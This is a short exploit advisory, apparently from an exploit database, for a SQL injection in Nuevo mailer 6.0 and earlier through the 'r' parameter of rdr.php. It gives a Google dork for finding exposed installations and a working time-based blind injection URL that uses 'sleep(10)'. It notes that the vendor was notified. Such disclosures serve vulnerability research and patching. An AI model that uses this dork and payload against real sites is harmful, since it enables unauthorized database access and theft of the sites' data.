15 lines
No EOL
408 B
Text
15 lines
No EOL
408 B
Text
# Exploit Title: Nuevo mailer version <= 6.0 SQL Injection
|
|
# Exploit Author: ALEH BOITSAU
|
|
# Google Dork: inurl:/inc/rdr.php?
|
|
# Date: 2017-06-09
|
|
# Vendor Homepage: https://www.nuevomailer.com/
|
|
# Version: 6.0 and below
|
|
# Tested on: Linux
|
|
|
|
Vulnerable script: rdr.php
|
|
Vulnerable parameter: r
|
|
|
|
PoC:
|
|
https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+
|
|
|
|
NB: vendor has been notified. |